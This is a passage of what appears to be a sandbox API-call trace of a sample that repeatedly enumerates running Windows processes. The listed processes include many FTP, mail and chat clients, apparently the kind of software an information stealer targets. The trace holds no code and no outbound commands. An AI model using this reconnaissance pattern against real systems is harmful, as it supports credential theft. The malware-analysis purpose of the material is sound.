lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0214.432] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0214.433] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0214.435] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0214.437] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0214.438] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.440] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.442] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.443] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0214.445] CloseHandle (hObject=0x11cc) returned 1 [0214.445] Sleep (dwMilliseconds=0x64) [0214.603] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0214.613] Process32First (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.615] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.616] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.618] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.619] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.622] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.623] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.625] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.627] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.629] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.631] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.633] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.635] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.703] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.705] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.707] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.709] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.710] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.712] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.716] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.718] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0214.720] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0214.722] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.724] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.726] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0214.727] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0214.730] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0214.733] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0214.735] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.737] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0214.739] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0214.741] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.743] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0214.839] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0214.842] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0214.843] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0214.845] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0214.846] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0214.847] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0214.849] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0214.851] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0214.852] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0214.855] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0214.856] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0214.858] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0214.859] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0214.860] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0214.862] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0214.863] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0214.865] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0214.866] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0214.867] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0214.869] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0214.871] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0214.873] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0214.874] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0214.876] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0214.877] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0214.879] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0214.880] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0214.882] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0214.955] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0214.957] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0214.959] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0214.960] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0214.962] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0214.965] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0214.967] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0214.968] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0214.970] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0214.972] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0214.973] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0214.975] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0214.977] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0214.978] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0214.983] 